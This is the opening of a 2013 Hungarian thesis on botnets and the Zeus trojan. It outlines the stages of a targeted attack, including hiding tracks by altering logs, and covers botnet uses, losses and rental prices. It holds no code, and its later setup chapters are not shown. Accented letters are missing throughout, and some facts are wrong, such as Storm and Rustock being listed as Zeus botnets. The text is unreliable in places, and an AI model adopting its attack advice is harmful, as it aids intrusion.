You are on page 1of 98

KECSKEMTI FISKOLA

GAMF Kar

Szakdolgozat
Katus Gbor Mrnk Informatikus szak, Hlzati s web technolgik szakirny, levelez munkarend

Kecskemti Fiskola Gpipari s Automatizlsi Mszaki Fiskolai Kar Kecskemt 2013

KECSKEMTI FISKOLA
GAMF Kar

Botnet hlzatok jellemzi, a Zeus botnet vals kpessgei, lehetsgei.

Tartalomjegyzk
1 2 3 4 5 6 7 Bevezets ....................................................................................................................... 5 Szmtgp tmads, clzott s adathalsz.................................................................... 7 Mire hasznljk? .......................................................................................................... 12 3.1 Pnzforrs eszkzei ............................................................................................. 12 Mekkora krokat okoznak? ......................................................................................... 15 Milyen kockzatok vannak? ........................................................................................ 18 Mennyibe kerl egy botnet? ........................................................................................ 19 Mi a botnet? ................................................................................................................. 20 7.1 7.2 7.3 7.4 7.5 7.6 7.7 7.7.1 7.7.2 8 8.1 8.2 8.3 8.4 8.5 8.5.1 8.5.2 8.5.3 8.6 8.6.1 8.6.2 8.6.3 8.6.4 A botnetek keletkezse s ltalnos mkdse ................................................... 20 A botnetek tevkenykedse ................................................................................. 21 Mkdse ............................................................................................................ 25 Elterjeds ............................................................................................................. 26 Botnet elnye s htrnya .................................................................................... 27 Fajti, tpusai ....................................................................................................... 28 Bot detektls s eltvoltsa ............................................................................... 30 Felhasznli szinten ..................................................................................... 30 Hlzati szinten............................................................................................ 32 Zeus ismertetse .................................................................................................. 34 Zeus cljai s funkcionalitsa .............................................................................. 35 Kros kdot tartalmaz csomag (malware package) ........................................... 38 Zeus elterjedse ................................................................................................... 38 Zeus teleptse s bezemelse ........................................................................... 39 Szksges eszkzk, elkszlet ................................................................. 40 Szerver bezemelse .................................................................................... 41 Bot kliens bezemelse ................................................................................ 63 Zeus mkdtetse ................................................................................................ 70 Bot elksztse ............................................................................................. 70 Bot eljuttatsa s megfertzse a cl szmtgpet ..................................... 71 Bot hasznlata .............................................................................................. 71 A kinyert informcik feldolgozsa, elemzse ............................................ 79 3

Zeus ............................................................................................................................. 34

8.7 8.8 9 11 12 13 14 15. 16.

Zeus elnyei......................................................................................................... 79 Zeus htrnyai...................................................................................................... 80

Az elrt eredmnyek kielemzse ................................................................................. 81 A vdekezs fajti........................................................................................................ 88 Irnyvonalak s a jvkp ........................................................................................... 89 sszefoglals ............................................................................................................... 90 Irodalomjegyzk .......................................................................................................... 92 brajegyzet.............................................................................................................. 95 Tblzat jegyzk ...................................................................................................... 98

1 Bevezets
Szakdolgozatom tmjnak egy mg mindig idszer, de kevsb ismert tmt, a botnetek vilgnak bemutatst vlasztottam. Vizsgldsom kzppontjba a Zeus (vagy ZBot) nven elhreslt, alkalmazs- s szoftvererforrs kihasznlson alapul tmadsi mdszer bemutatst helyeztem. A vlasztsom azrt erre a tmra esett, mert a gazdlkodszervezetek mellett egyre tbb magnszemly esik ldozatul ilyen tpus tmadsoknak. Ma a vilgban az internet mr nem csak az llami s az zleti szfrban, hanem az otthonokban is knnyedn elrhet. A folyamatosan cskken djak mellett az internet szolgltatk egyre nagyobb svszlessg hozzfrst biztostanak elfizetknek. Ma mr nem csak asztali s hordozhat szmtgpek, hanem mobiltelefonok, multimdia lejtszk, tblagpek, e-book olvask, "okos" televzikszlkek s jtkkonzolok segtsgvel is csatlakozhatunk a vilghlhoz. Az elbbiekben emltett informatikai eszkzk rohamos fejldsvel lpst tartva a krtkony alkalmazsok kszti egyre tbb informcit kpesek eltulajdontani az vatlan felhasznlktl. Az informciszerzsen tl a tmadsok az eszkzk erforrsainak kihasznlsra is irnyulhatnak. A krtkony szoftverek egyre komolyabb veszlyt hordoznak magukban, s a vllalatokkal szemben az otthoni felhasznlkat nem vdik kpzett szakemberek. Vrusok, frgek, trjaiak, kretlen levelek, tlterhelses tmadsok. Mind-mind az internet rnyoldalai. A krtevk sszes kpessgt magba foglalva egy minden eddiginl nagyobb veszlyforrs jelent meg a kibertrben: a botnet. Az utbbi idben a hradsok egyre tbb olyan botnet tmadsrl szmolnak be, amelyek vgrehajtsval hatalmas krokat okoztak szolgltatknak, vllalatoknak s magnszemlyeknek, ezzel a tnnyel is igazolva, hogy a rosszindulat hlzatok minden felhasznlra egyformn veszlyt jelentenek. A szakdolgozatomban elszr ltalnossgban ismertetem az interneten a felhasznlkra leselked veszlyforrsokat, majd egy, az ezeket a veszlyeket egyest Zeus botnet bezemelsnek menett rom le lpsrl-lpsre s bemutatom a Zeus botnet hlzat leggyakrabban hasznlt kpessgeit. Ismertetem tovbb, hogy a Zeus milyen tpus adatok megszerzsre kpes, mekkora veszlyt jelentenek az eltulajdontott adatokkal val visszalsek a felhasznlkra nzve s azok mekkora rtket kpviselnek a tmadk szmra. Vgl sszegzem s elemzem a Zeus ltalam is hasznlt kpessgeit s a

botnet tpus krtkony szoftverek elleni hatkony vdekezsi eszkzket s mdszereket mutatok be. A szakdolgozatom elksztshez nyjtott segtsgkrt ksznettel tartozom bels konzulensemnek, Gcs Lszl Tanr rnak az tmutatsrt, tmavezeti tmogatsrt s kls konzulensemnek, Marosi Attilnak, mentoromnak, munkatrsamnak s bartomnak, aki sok j tanccsal ltott el a dolgozat ksztse sorn.

2 Szmtgp tmads, clzott s adathalsz


Szmtgp vagy szmtgpes hlzat elleni tmadsnak minsl minden olyan ksrlet, amely krt okoz a hlzatban, mdostja azt, onnan adatokat lop el, vagy illetktelenek szmra jogosulatlan hozzfrst szerez. Az IETF (Internet Engineering Task Force) a szmtgpes tmadsokat az RFC 2828 szm szabvnyban meghatrozza:

A tmads a rendszer biztonsgt veszlyezteti, ami elre elhatrozott fenyegets vagy cselekmny, szndkos tmadsi ksrlet a szmtgp vagy hlzat, rendszer ellen, oly mdon, hogy elkerljk a biztonsgi szolgltatsokat s megsrtsk a biztonsgi hzirendet. A tmadsok vgrehajtja lehet szemly, szemlyek, vagy akr lehet szervezet is. A tmadsnak szmos indoka lehet, de az ltalban haszon szerzs cljbl trtnik. Az ezeket tmadsokat kezdemnyez szemlyeket Black Hat (fekete kalapos) megnevezssel illetjk. A tmadsokat sokflekppen lehet kategorizlni, n a szakdolgozatomban kt f kategrit klnbztetek meg: aktv s passzv tmadsok. Az aktv tmads sorn a tmad clja a rendszer erforrsainak kihasznlsa s mkdsnek befolysolja. A tmad gy veszlyezteti a rendszer integritst s/vagy mkdst, rendelkezsre llst. A passzv tmads sorn a tmad oly mdon szerez informcit a rendszerrl, hogy nem befolysolja annak mkdst s erforrsait, gy asszimilldik, s tevkenysge teljes titokban marad. A tmadsok fejldsvel s elterjedsvel egyre tbb olyan szervezet, csapat, munkacsoport jtt ltre, akik clja, hogy ezeket a tmadsokat megelzzk vagy elhrtsk. Az egyik ilyen fontosabb vdekezsi mdszer, hogy a szervezetek Informci Biztonsgi Irnytsi Rendszereket (Information Security Management System) vezetnek be, amelyek biztonsgi stratgiai szablyokat megalkotsval a kockzatelemzsi elvek s ellenintzkedsek kialaktst jelentik. A msik lehetsg, hogy a szervezet partneri kapcsolatot alaktanak ki a nemzeti, kormnyzati, gazati CERT-ekkel (Computer Emergency Response Team), amelyeket annak rdekben hoztak ltre, hogy a tmadsok bejelentst, szlelst kveten irnytsk az ellenintzkedseket. A tmadsokat kt tovbbi kt csoportba lehet is be lehet sorolni: clzott tmadsok, vagy pedig adathalsz (phishing) tmadsok, amelyeket sorn brki ldozatt vlhat. [3] [4] [5]

Egy clzott tmads lpsei A clzott tmadst gy kell felpteni, hogy a hatkonysg rdekben azt tbb rszre bontjuk szt. Egy kidolgozott tmads elmlett sablonba ltetve azt ksbb brmilyen rendszerre tudjuk alkalmazni, hiszen a tmads alapveten ugyanazokbl a lpsekbl ll. Ezeket a lpseket betartva a tmads valsznleg sikerrel fog vgrehajtdni. 1. Felderts (Reconnaisance): A tmad ismeretet gyjt a szervezetrl, rendszerrl, emberekrl, a hlzat kiptsrl, topolgijrl, topogrfijrl, annak biztonsgrl. Minden olyan ismeret fontos lehet a tmad szmra, amelyet majd ksbb fel tud hasznlni a tmads sorn. Fontos, hogy minl rszletesebben ismerjk meg a rendszert, mert brmilyen aprnak tn informci is segthet bennnket. A msik nagyon fontos dolog pedig az, hogy minden megszerzett ismeretet jegyezzk fel, mert azt ksbb elfelejthetjk. Nem tudhatjuk azt, hogy a jvben mely informci felhasznlsa vlhat szksgess. A feldertsnek kt fajtjt klnbztetjk meg: aktv s passzv felderts. [3] [4] [5] a) Passzv felderts (Passive resonnaisance): ide tartozik a hlzat figyelse, s a nylt eszkzkkel trtn informcigyjts (OSINT). Ilyen eszkzk lehetnek az internetes keresk (pl: Bing, Exalead, Google, Yahoo), cginformcis keres oldalak (pl: online cgjegyzkek). Manapsg mr nagy divat, hogy a kzssgi oldalakon mr nem csak magnszemlyek, hanem cgek, szervezetek is rendelkeznek sajt profillal. Rengeteg hasznos informcit tallhatunk meg s gyjthetnk be a weboldalakrl. Ilyen informcik lehetnek a szervezet zleti partnerei, dolgozinak elrhetsgei (e-mail, telefon, Skype): Ezeket az informcikat egy social engineering tmads sorn hasznlhatjuk fel, amely sorn ahonnan jabb tovbbi informcit s adatot tudunk megszerezni. Az ldozat weboldalnak megtekintse sorn olyan informcikat nyerhetnk ki, hogy milyen technolgival kszlt az adott oldal, milyen scripteket alkalmaznak, hol lehet a web szerver, tallhatak-e ms oldalak a szerveren. Nagyon gyakori, hogy gy hajtanak vgre a tmadst, hogy a kiszolglan egy msik weboldal gyengesgt kihasznlva jut el a tmad cljhoz. Ez elbb felsorolt tmadsok sorn mindvgig ismeretlenek (anonymous) maradunk, oly mdon szerezhetnk informcikat, mint

egy egyszer felhasznl, aki csak szrfl a neten. gy is mondhatnk, hogy a tmad eltnik a tmegben. [3] [4] [5] b) Aktv felderts (Active resonnaisance): Ezt a fajta tmadsi mdszert azrt nevezik aktvak, mert a tmads sorn nem felttlenl maradunk ismeretlenek. A tmad felderti a hostokat, a nyitott portokat (de mg nem clzott port szkennelssel), a szervereket, e-mail szervereket s az IP cmt. Esetenknt megtudhatjuk a szervereken lv szoftverek tpust, verziszmt, vagy ki tudjuk kvetkeztetni azokat ms adatokbl, egyb informciforrsbl. [3] [4] [5] 2. Szolgltatsok feldertse (Scanning): Az eddigi informciszerzs alapjn sszegyjttt IP cmeket, IP cm tartomnyokat vgigellenrizzk egy port szkenner alkalmazs segtsgvel. Olyan informcikhoz juthatunk hozz, mint, hogy milyen szolgltatsok rhetek el a kiszolgln, milyen opercis rendszer, mely, verzija fut, milyen egyb programokat hasznlnak s vgl, hogy milyen hardver konfigurcin zemel a szerver. [3] [4] [5] 3. Sebezhetsgek azonostsa (The identifiction of vulnerabilities):

Srlkenysgek felkutatsa sorn az egyik mdszer az, hogy olyan programokat hasznlnunk, amelyekkel a clszmtgpen klnbz srlkenysgeket tudunk felderteni. Ezen tl sajt tudsunk s tapasztalataink alapjn szemlyesen, clzottan is vizsgldhatunk. Termszetesen minl tbb informci ll rendelkezsnkre, annl knnyebben tudjuk elrni a clunkat, ezrt rdemes mind a kt mdszert hasznlni. [3] [4] [5] 4. Hozzfrs a rendszerhez (Gaining Access): Az eddig begyjttt s megszerzett informcik alapjn itt kezddik a valdi tmads a kiszemelt szmtgp vagy rendszer ellen. A hacker megprblja azonostani s kihasznlni a rendszer srlkenysgeit vagy ennek hinyban ksrletet tesz j srlkenysget ltrehozni az rendszeren. Egy tmads clja nem felttlenl az, hogy a rendszert feltrjk vagy onnan fontos informcit szerezzenek. Ha ellehetetlentenek, elrhetetlen tesznek egy rendszert, mondjuk egy DoS vagy DDoS tmadssal az ugyanolyan tmadsnak minsl csak tmads eredmnye, vgkimenete lesz ms. [3] [4] [5] 9

5. Hozzfrs fenntartsa (Maintaining access): Sikeres tmadst kveten az els lps annak biztostsa, hogy ksbbiekben is ugyangy hozzfrjnk a rendszerhez. Ennek rdekben biztostanunk kell a bejutst s informciszerzst a jvben is. Ennek elrse rdekben tbb mdszert is lehet alkalmazni, ilyenek lehetnek a rootkitek, backdoorok, trjaiak. [3] [4] [5] 6. Nyomok eltntetse (Covering tracks): Minden rendszer feltrsben a nyomok eltntetse kiemelked szerepet tlt be. Ez azrt is fontos, mert ha az zemeltetk nem fedik fel, hogy rendszerk kompromittldott, akkor nem is fognak fellpni a tmad ellen, gy knnyebb fenntartani a hozzfrst. A msik nagyon fontos a tmad tevkenysg vgrehajtsa sorn se talljanak meg minket. Ahhoz hogy mindvgig ismeretlenek maradjunk a legfontosabb dolog a naplllomnyok (log file-ok) manipullsa, trlse. Ha valamilyen alkalmazst hasznlunk erre a clra, akkor azt megfelelen el kell rejteni (akr szmos alknyvtrban egyidejleg, akr egy ltalnos helyen) akr steganogrfival (kpi informcirejtssel) elfedve. [3] [4] [5]

1. bra Clzott tmads lpsei

10

Adathalszat (phishing), azaz brki lehet ldozat. Az adathalszat tpus tmads lnyege, hogy a bnz nem egy adott szemlyt cloz, meg akitl adatokat vagy informcit kvn szerezni, hanem egy adott cl elrse rdekben cselekszik, szmra mindegy, hogy ki lesz vagy kik lesznek a potencilis ldozatok. Ezek az adatok lehetnek pldul: felhasznlnevek, jelszavak, e-mail cmek s a hozz tartoz jelszavak, bankkrtyaszmok, PIN, PUN kdok, klnbz felhasznli fikok (accountok), stb. Az adathalszatnak az ltalban hasznlatos mdszere az, amikor egy ismert cg hivatalos honlapjnak lttatja magt, s megprbl szemlyes adatokat megszerezni a gyantlan ldozatoktl. A botnetek adathalsz tpus szolgltatsokat is teljestenek, az egyb tmadsi tevkenysgek mellet. Mg egy adathalszatra kszlt oldal korltolt kpessgeket tud, azaz csak informcigyjtsre kpes, de egy botnet krtkony kd hasznlata esetn sokkal tbb tmadsi lehetsget hasznlhatunk. A kretlen levelek (spamek) formjban megclzott emberek lehetsges vevk lehetnek, de a tmads irnyulhat az ldozat erforrsainak kihasznlsra is. [3] [4] [5]

11

3 Mire hasznljk?
Az internetes bnzk hamar felismertk, hogy az egyre nagyobb szmtgpes hlzatokat bekebelez botneteknek mekkora erejk van. A vrusksztk krben egyre ismertebb s kedveltebb vlt a botok alkalmazsa, gy azok rohamos fejldsnek indultak. A botokat az id elrehaladtval tbb s tbb, egyre fejeltebb funkcival s sszetettebb tmadsi formkkal bvtettk. A bellk kiplt fldrajzilag nagy kiterjeds hlzatokat egyre tbb fle tmadsi forma vgrehajtsra tudtk hasznlni. A botnet hlzatok risi nagy erejv vltak. A kiberbnzk krben a botnetek hasznlata nagyon gyorsan elterjedt lett, mert a botok hasznlatval minden eddiginl nagyobb er lt a rendelkezskre. A gyors meggazdagods remnyben a botokat tovbb fejlesztettk s szmuk is drasztikusan megnvekedett. A botok most mr nem csak szemlyes adatokat s informcikat voltak kpesek megszerezni, hanem egyre npszerbb lett a DOS s a DDOS szolgltats megtagadssal jr tmads s a spam levelek kldse is. Mivel ezek a hlzatok akr tbb milli emberrel, mint ldozattal kerltek kapcsolatba, ezrt a lehetsge vgtelen trhza vlt elrhetv a kiberbnzk rszre. Ez a mdszer hatkony s arnylag biztonsgos a szmtgpes bnzk szmra, ezrt a gyors meggazdagods egyik kzkedvelt eszkzv vlt. [6]

3.1 Pnzforrs eszkzei


Bankszmla (adatok): manapsg szinte minden szmtgp felhasznl rendelkezik bankszmlval, hiszen, az emberek ide kapjk a fizetsket, itt troljk a pnzket, befektetseiket. A bankszmlk kz tartoznak a klnbz virtulis bankszmlk is, amelyeken szintn trolnak pnzt s a szmlk pnzmozgsra alkalmasak. A virtulis bankszmlk adatainak megszerzse az adathalszat sorn kitntetett figyelmet lvez. Akr mennyire is hihetetlen manapsg a kiberbnzk ezeket az adatokat hihetetlen nagy mennyisgben knljk eladsra a klnbz az internetes feketepiacokon. A bnzk adathalsz mdszerrel begyjtik a bankszmlkhoz tartoz adatokat (nv, cm, bankszmlaszm, pin kd, egyb biztonsgi kdok, biztonsgi krdsekre adand vlaszokat) s ezeket egy msik bnznek eladjk tovbbi felhasznlsra. A Zeusnak van egy olyan mdosult vltozata, amelyet ZitMo-nak (Zeus in the Mobile) neveztek el. [14] Ezt az alkalmazst kimondottan az online banki tranzakcik sorn hasznlt adatok

12

megszerzsre fejlesztettk ki. A ZitMo-t alkalmazst majd a ksbbiekben fogom ismertetni. [6] Accountok: Az ember nem is gondoln, hogy a szrakozsra sznt alkalmazsokban is mennyire sok pnz van. Ahogy egyre nagyobb teret nyert az internet a nagyvilgban s az szinte minden eszkzn elrhet manapsg a szoftverfejlesztk ezt felismerve olyan programokat kezdtek kszteni, amelyek segtsgvel egy msik virtulis vilgba csatlakozhatunk be. Ezek a programokat sszefoglal nven online alkalmazsoknak hvjk. Ezekkel az online alkalmazsokkal a vilgszerte tbb millian jtszanak, szrakoznak. A kiberbnzk hamar felismertk az ebben rejl a pnzforrsi lehetsget, s elkezdtk ezeket az adatokat is begyjteni s ruba bocstani. Ilyen programok lehetnek online krtyajtkok (pl.: PokerStars), online szmtgpes jtkok (pl.: World of Warcraft). Ezekhez a programokhoz bankszmlk vagy virtulis szmlk vannak ktve, gy ezeket az adatokat is meg tudjk szerezni. De nem csak a vals pnz megszerzse a kiberbnzk kizrlagos clja, hanem a jtkbeli virtulis pnzeket is ellopjk s kereskednek velk. [6] Spam levelek: A kretlen levelek tovbbtsval elssorban nem adatot vagy informcit akarnak ellopni az ldozattl, hanem valamilyen termk vsrlsra kvnjk sztnzni, rbrni. A kiberbnzk vagyona nem az ldozattl ellopott adatok felhasznlsbl, rtkestsbl gyarapszik, hanem a megrendel fizet megbzsi djat azrt, hogy az termkt hirdesse spam levelek segtsgvel. Az ember nem is gondoln, hogy a kretlen levelek sikerre vezetnek, pedig egy ilyen szolgltats ignybevtele esetn az elkldtt levelek mennyisgnek fggvnyben a cmzettek 4-5 szzalka lehetsges vsrlv vlik. Ez azt jelenti, hogy ha a termket/termkeket knl kretlen levelet eljuttatjk 1 000 000 emberhez, akkor 40-50 ezer ember vsrl lesz. [6] Erforrs felhasznls: Ebben az esetben a tmad clja a megfertztt ldozat gpnek erforrs-felhasznlsa. Ezt a szolgltatst kiprgetses jelsz- vagy titkost kulcs feltrsre (brute force vagy key-space attack) vagy szolgltats megtagadsra irnyul tmads kivitelezsre szoktk hasznlni. A nyers ervel trtn jelsztrs kiprgetik a jelszt, ami azt jelenti, hogy minden lehetsges jelsz vltozatot vgig prblnak a mvelet sorn. Ennek a mdszernek az a htrnya, hogy nagy az erforrs s idignye. A folyamat 13

felgyorsthat, ha egy idbe minl tbb szmtgpet (szmtsi kapacitst) hasznlnak. A DoS vagy DDoS szolgltats megtagads elrsre irnyul tmads lnyege, hogy a szolgltatt, amely zemelteti a rendszert (pl.: weboldal, adatbzis szerver, vagy valamilyen online szolgltatst nyjt szerver, stb) ideiglenesen mkdskptelenn tegye rvidebb vagy hosszabb idre. [6] [7]

14

4 Mekkora krokat okoznak?


Manapsg a televziban, rdiban, interneten sok hrt lehet hallani mindenfle vrustmadsrl. Ezeknek a vrustmadsoknak a dnt tbbsge valamilyen adathalsz tpus tmads, amelynek forrsa botnet hlzatok ltal fertztt szmtgpek tmegbl ered. A Marshal biztonsgi cg tanulmnyai alapjn 2006-2007-ben fedeztk fel elszr a botneteket. Az els ilyen nagyobb hlzatot Storm nven emltik. A cg tanulmnya szerint hat nagy zombi hlzat ltja el az internetes spamforgalmnak 85 szzalkt. Ezek a hlzatok klnfle mdokon reklmoztk magukat. Volt, amely hressgek pornogrf felvteleinek lcztk vagy valamilyen Flash lejtsz frisstsnek adtk ki magukat. [29] [37] Hat nagyobb Zeus botnet: Storm Srizbi Rustock Hacktool Kraken Zunker

2011-ben nyilvnossgra hoztak egy Zeus forrskdot, amely pillanatok alatt elterjedt a vilgban s azta tbb szz j vltozat kerlt ki az internetre. Kiberbnzk hoztk nyilvnossgra a Zeus forrskdjt abbl a clbl, hogy minl tbb vltozat lelhet fel a vilgban, amelyet tbb ezren hasznlnak, akkor a nyomozszerveknek nehezebb a nyomozs az ilyenfajta gyekben. A szakdolgozatomban n is ezt a 2011-ben nyilvnossgra kerlt alap Zeus-t forrskdot fogom bezemelni, vals kpessgeit bemutatni s analizlni. Az albbiakban megemltetek nhny Zeus vltozat ltal megvalstott tmadst, amelyek az utbbi pr vben trtntek a vilgban, amelyekrl a CERT-Hungary, a Bitonsgportl, a Technet, s a Symantec jelentsei, tanulmnyai is emltst tettek. 2010 Ebben az vben nyilvnossgra hozta a Trusteer biztonsgi cg, hogy tbb mint 15 amerikai bank kerlt veszlybe, mert egy Zeus vltozat tbb milli hitelkrtya adatot 15

szerzett meg. Majd 2010 oktberben az FBI felfedezett egy nagy nemzetkzi botnet hlzatot mkdtet bnszervezetet, amely egy Zeus bot vltozatot hasznlta. sszesen krlbell 70 milli dollr rtkben sikerlt klnbz bankkrtykrl pnzt lopniuk. Az FBI tbb mint 90 felttelezett tagot vett rizetbe, egy rszket Egyeslt llamokban, de tartoztattak le embereket mg Egyeslt Kirlysgban, Ukrajnban illetve Oroszorszgban is. [31] 2010 augusztusban az M86 Security Labs leleplezett egy Zeus trjait, amely egy nagy britanniai bank gyfeleitl lopott el krlbell 230 milli forintnak megfelel sszeget. Egy fertztt hirdetssel vettk r az ldozatokat, hogy bot feltelepljn a szmtgpkre. A trjai minden banki adatot ellopott, s ha megfelel sszeg volt a bankszmln, akkor a bot elutalta a bnzk bankszmljra. Megkzeltleg 3000 ember volt rintett az gyben. [32] A Waledac nev bot a becslsek szerint 70-90 ezer szmtgpet fertztt meg. A botnet kpes volt naponta 1,5 millird spam zenetet kldeni szerte a vilgba. Ez krlbell a teljes vilgban elkldtt spam zenetek 1 szzalkt tette ki. A mvelet sorn 277 Domain nevet hasznltak irnytsra s ellenrzsre. Habr sikerlt felszmolni a szervereket a botok tovbb tudtak mkdni, mert kpesek voltak peer-to-peer kommunikci tjn tartani egymssal a kapcsolatot. [13] [16] [33] A Kelihos botnetet a kutatk szintn 2010-ben fedeztk fel, amely egy j vltozata a Storm vagy Waledac botnetnek. Az j botnet mintegy 45 ezer szmtgpet fertztt meg, a botnet becslsek szerint kpes volt 4 millird kretlen levelet kldeni egy nap. [34] 2011 A Rustock botnet 2006-tl egszen 2011-ig zemelt. A fertztt szmtgprl kpes volt akr 25.000 spam zenetet kldeni rnknt. A szakrtk szerint krlbell 2-2,5 milli gpet fertztek meg, a botnet elsdleges clja leginkbb a sajt terjesztse volt. A tovbbtott e-mailek tartalmaztk a rosszindulat bot telept kdjt is, ezzel nvelve a bot hlzatt. 2011-ben az Amerikai hatsgok egyttmkdve a Microsoft-tal pnzjutalmat ajnlottak fel azok szmra, akik Rustock bottal kapcsolatban rdemi informcival tudnak

16

szolglni s ennek eredmnyekppen sikerlt beazonostani s rizetbe venni z kiberbnzket. [35] 2012 Az utols hnapjban egy jabb Zeus vltozat szedett ldozatokat szerte Eurpban. Ez volt az gynevezett Eurograbber akci. Tbb mint 30 ezer ember rintettet a mvelet s megkzeltleg 36 milli eurt loptak el olasz, holland, nmet, spanyol banki gyfelektl. A vrustmadst a Zeus jabb vltozatval, az gynevezett ZitMo trjaival hajtottk vgre. Magyar krosultakrl nincs tudomsunk, a vrus kszti olasz s nmet nyelv szvegekkel prbltk rvenni ldozataikat, hogy megfertzzk eszkzeiket. [14] [12] 2013 A legjabb Zeus vltozat janurban jelent meg Facebook, Gmail, Yahoo s Hotmail felhasznlkat cloz meg s prblja ket rvenni, hogy nknt megfertzzk a sajt szmtgpket. A Gameover nev vltozat eltrbe helyezi a DoS s a DDoS szolgltats megtagadsi tmadst illetve a web injection alap krokozst. Az j Zeus vltozat j vdelmi szolgltatst gr a Facebook, Gmail,Yahoo, Hotmail felhasznlinak szmra cserbe kri a felhasznlk szemlyes s hitelkrtya adatait. [13] Mrcius vgn az orosz Zeus botnetet hasznl bnzk egy csoportja egy 300 Gbps svszlessg DDoS tmadst indtottak, amellyel a Spamhaus mkdst kvntk ellehetetlenteni. A Spamhaus egy non-profit szervezet, amely az egyik legnagyobb spam feketelistz szervezet. A tmadst gy hajtottk vgre, hogy szmos DNS szervernek kldtek tmrdek mennyisg DNS krst gy, hogy az ldozat cmt hamstottk a sajtjuk helyre, gy a DNS szerverek az ldozat gpnek vlaszoltak, vagyis jelen esetben a Spamhaus szervernek. Azrt vlasztottk ezt a mdszert, mert a DNS szerver egy krsre tbb nagyobb mret zenettel vlaszol, gy knnyedn megsokszorozhat a tmads ereje. Ennek a mdszernek a felhasznlsval tudtk elrni a 300 Gbps svszlessg DDoS tmadst. [36]

17

5 Milyen kockzatok vannak?


A botnet hlzatok risi biztonsgi kockzatokat jelentenek mind a magnszemlyek mind a cgek szmra, mivel ezeket a hlzatokat elssorban bncselekmnyek elkvetsre hasznljk a ksbbiekben. Vllalat Egy vllalat szmra nem csak a cges s a szemlyes felhasznli adatok veszlyeztetettsge jelent kockzatot, hanem az is, hogy k felelssgre vonhatk a fertztt hlzat ltal okozott bncselekmnyekrt. A botnetek ezeket a hlzatokat nem csak arra hasznljk, hogy a rajtuk trolt adatokat ellophassk, hanem az hlzathoz csatlakoz szmtgpek erforrst is kihasznlhatjk, vagy akr az egsz hlzatot megbnthatjk. Egy cg letben ez jelents pnzkiesst okozhat, hiszen egy jl men web ruhzat zemeltet cg hlzata, ha 1-2 ra vagy akr pr napra mkdskptelenn vlna az akr tbb milli forintos bevtel kiess jelenthet a cg szmra. Ha a bot informcit vagy adatot lop el a vllalattl, akkor a vesztesg a cg szmra nem csak pnzben mrhet, hanem ezen tl a vllalat a hitelessgt is elvesztheti a versenytrsaival szemben, vagy ms vllalatokkal szemben jelents gazdasgi htrnyba kerlhet Magnszemlyek A kiberbnzk azrt tmadnak magnszemlyeket is mert rengeteg olyan szemlyes adatot tudnak ellopni tlk, amelyekkel visszalve knnyen pnzt szerezhetnek. Egy magnszemly identitst ellopva, akr a hitelkrtya adatait felhasznlva pnzt lophatnak a mit nem sejt ldozattl. A bnzk ms mdszer segtsgvel pnzt csikarhatnak ki az ldozataikbl, mg pedig gy, hogy valamilyen termk megvsrlsra brjk r ket. Annak a kockzatnak a mrtke, hogy valamilyen mdon megkrostjk az internethasznlkat kiemelkeden magas. Mindenki lehetsges clszemly, aki ksbb akr ldozat is lehet.

18

6 Mennyibe kerl egy botnet?


A kzelmltban egy neves biztonsgi szakrt Dancho Danchey, feltrt egy olyan lehetsget az interneten, amely segtsgvel botnet szolgltatst, zombi hlzatokat lehet vsrolni vagy brelni. gy manapsg, mg ha nem is rendelkeznk a megfelel informatikai szaktudssal, hogy ltrehozzunk egy botnet hlzatot akkor is lehetsgnk nylik arra, hogy brelhessnk egy zombi hlzatot magunknak, olyan paramterekkel, amilyenekre csak szksgnk van. Egy botnet hlzat ra nagyban attl fgg, hogy hol helyezkedik el fizikailag a megfertztt gpekbl ll hlzat. Termszetesen egy eurpai vagy szak-amerikai hlzat tbbet r, mint egy kevsb fejlett orszgban lv hlzat. Ennek az oka az, hogy amerikai vagy eurpai polgr tbb online vsrl ert hordoz magban, mint egyb ms orszgokban lk. A botnet piacon, mg egy Eurpban tallhat 10.000 hosztbl ll hlzat 400 dollrba kerl, addig egy kevsb fejlett orszgban ugyanennyi hosztbl ll hlzat pontosan a felbe, azaz 200 dollrba kerl. Az amerikai piac mg drgbb, mert ott egy 10.000 hosztbl ll zombi hlzat 1000 dollrba kerl. [38]

2. bra Bot net hlzat vsrls

19

7 Mi a botnet?
A botnet elnevezs az angol "roBOT NETwork" kifejezsbl szrmazik s az IRC (Internet Relay Chat) internetes programbl fejldtt ki. Ezek az alkalmazsok az internetes beszlgetsi szolgltatsokhoz kapcsoldan jttek ltre, s olyan feladatokat lttak el, amelyek segtettk a szmtgpek tvoli irnytst. A botok az IRC rendszeren dvzlst, zenetkzvettst, szolgltatsok s jogosultsgok belltst biztostottk. Mindezen a programokat neveztk el botoknak. Ekkor mg kizrlag j clokra hasznltk a botokat. A kiberbnzk hamar felfedeztk, hogy ezeket a botokat felhasznlva rosszindulat kdokat kszthetnek s trvnytelen, kros mveletek vgrehajtsra kezdtk hasznlni ket. A botok eddigi tudst felhasznlva lehetsgk nylt szoftverek mkdsnek koordinlsra, gy indtva hatkonyan s sszehangolt tmadsokat. A botok elre beprogramozott dolgokat hajtanak vgre, ilyen lehet pldul: a spam levlklds, DoS vagy DDoS tmads (szolglat megtagads), erforrs felhasznls, adatok, informcik megszerzse az ldozattl. Ezek a botok egy vagy tbb hlzatban vannak sszeszedve, a botok vagy egymssal, vagy a controll panellel kommuniklnak. A botok a controll paneltl kapjk az utastsokat s a controll panelnek kldik a megszerzett informcit. Ezeket a botokat vagy rtelem nlkli robotokat zombiknak szoktk nevezni, az a hlzatott, amelyet megfertznek s irnytanak pedig zombi hlzatnak szoktk nevezni. [7] [28] [30]

7.1 A botnetek keletkezse s ltalnos mkdse


Az els bot 1993-ban szletet, Robey Pointer ksztette, de ez a botot nem rosszindulat program volt, hanem arra hasznltk, hogy az IRC (Internet Relay Chat) szolgltats bvljn. Egg Drop-nak neveztk el ezt az alkalmazst, amit arra volt kpes, hogy egyszer programokkal, scriptekkel lehessen bvteni az IRC funkcionalitst. Kpes volt mg arra, hogy tbb kliens sszehangoltan tudjon mkdni, ami a mai botnet egyik alapkve. A botnetek az letk sorn hasonl funkcionlis lpseken mennek, keresztl ezek az letciklusok ltalban megegyeznek a klnbz fle botneket kztt. Ahhoz hogy egy botnet hlzat ltrejjjn, kell egy olyan szmtgp, amely az ldozatul vlhat. Az els lps az, hogy a bot gazda ltrehozza a bot-ot s a vezrlshez szksges krnyezetett. Ha a bot kszen ll a hasznlatra, akkor valahogy r kell venni az ldozatot, hogy a gpre feltegye a krtkony kdot. Ez a mdszer nagyon sokfle lehet, ezek ltalban valahogyan 20

